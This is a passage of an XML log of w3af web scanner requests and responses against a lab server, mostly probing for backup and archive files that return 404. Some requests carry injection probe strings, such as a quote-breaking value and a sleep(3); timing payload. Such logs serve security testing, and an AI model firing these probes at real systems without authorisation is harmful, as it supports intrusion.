                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27z%220 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27z%220'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="342">
                <http-request>
                    <status>GET http://10.12.68.43:31337/jzYrc0ii HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about jzYrc0ii has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='jzYrc0ii'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="343">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3C%21-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3C%21-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3C%21--'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="344">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="345">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="346">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute~ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about choucroute~ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='choucroute~'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="347">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="348">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="351">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="352">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="353">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="354">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="356">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="357">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="358">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="359">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="360">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="362">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="363">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="364">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="554" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="365">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="367">
                <http-request>
                    <status>GET http://10.12.68.43:31337/sleep%283%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about sleep%283%29%3B has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='sleep%283%29%3B'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="368">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
